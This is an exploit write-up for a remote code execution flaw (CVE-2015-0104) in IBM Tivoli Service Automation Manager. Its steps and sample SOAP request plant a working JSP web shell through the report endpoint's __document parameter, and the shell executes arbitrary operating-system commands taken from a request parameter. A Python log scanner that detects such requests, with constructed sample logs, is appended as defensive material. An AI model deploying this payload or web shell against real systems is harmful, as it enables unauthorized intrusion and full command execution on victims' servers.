# Exploit Title: IBM Tivoli Service Automation Manager Remote Code Execution
# Date: 12\12\2014
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: http://www.ibm.com/
# Version: All versions of IBM Tivoli Service Automation Manager up to 7.2.4
# VU/CVE: VU#782708, CVE-2015-0104

1. Create report
2. Browse to: https://site/maximo/report?__document=/system/path/web/root/shell.jsp&__report=&appname=&__requestid=&reportNum=
3. Catch SOAP request generated by submitting form from previous step and inject JSP payload.

Sample SOAP request:

POST /maximo/report?__document=/system/path/web/root/shell.jsp&__report=&appname=&__requestid=&__sessionId= HTTP/1.1
Host: site
Content-Length: xxx

DocumentDocumentGetPagewhereaaaaaaaaaaaaaaaaaaaaaa
<%
try {
    String cmd;
    String[] cmdarr;
    String OS = System.getProperty("os.name");
    if (request.getParameter("cmd") != null) {
        cmd = new String (request.getParameter("cmd"));
        if (OS.startsWith("Windows")) {
            cmdarr = new String [] {"cmd", "/C", cmd};
        } else {
            cmdarr = new String [] {"/bin/sh", "-c", cmd};
        }
        Process p = Runtime.getRuntime().exec(cmdarr);
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
            out.println(disr);
            disr = dis.readLine();
        }
    }
} catch (Exception e) {
    e.printStackTrace();
}
%>]]>aaaaaaaaaaaaaaaaaaaaaa__isdisplay__whereappnameAPPNAME__isdisplay__appnameAPPNAMEusepagebreakstrue__isdisplay__usepagebreakstrue__page1__svgtrue__page1__taskid

4. Web shell is now ready to use in path specified in __document parameter's value
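
A defender-side check for the request pattern in steps 2 and 3, added here as an example and not part of the original advisory: it scans web access logs for requests to /maximo/report whose __document parameter names a JSP file. The combined log format, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# File types a Java servlet container would execute (list is an assumption).
SCRIPT_EXT = (".jsp", ".jspx", ".jspf")

def suspicious_document(target):
    """Return the decoded __document value when the request target hits the
    report endpoint and __document names a JSP file; otherwise return None."""
    parts = urlsplit(target)
    if not parts.path.lower().rstrip("/").endswith("/maximo/report"):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("__document", []):
        # parse_qs has already percent-decoded the value; normalise case and trailing noise.
        name = value.lower().split(";")[0].rstrip("/. ")
        if name.endswith(SCRIPT_EXT):
            return value
    return None

def scan(lines):
    """Yield (line_number, method, __document value) for each flagged log line."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hit = suspicious_document(m.group("target"))
        if hit is not None:
            yield n, m.group("method"), hit

# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Dec/2014:10:00:01 +0000] "GET /maximo/report?__document=/reports/out/r1.rptdocument&__report= HTTP/1.1" 200 5120',
    '192.0.2.44 - - [12/Dec/2014:10:03:17 +0000] "POST /maximo/report?__document=/system/path/web/root/shell.jsp&__report=&appname= HTTP/1.1" 200 812',
    '192.0.2.44 - - [12/Dec/2014:10:03:40 +0000] "POST /maximo/report?__document=%2Fsystem%2Fpath%2Fweb%2Froot%2Fshell%2Ejsp HTTP/1.1" 200 812',
    '192.0.2.10 - - [12/Dec/2014:10:05:00 +0000] "GET /maximo/ui/login HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, method, doc in scan(SAMPLE_LOG):
        print(f"line {n}: {method} with __document={doc}")
```

Matching on the decoded parameter rather than the raw log line is what catches the percent-encoded third entry, which a plain string search for ".jsp" would miss.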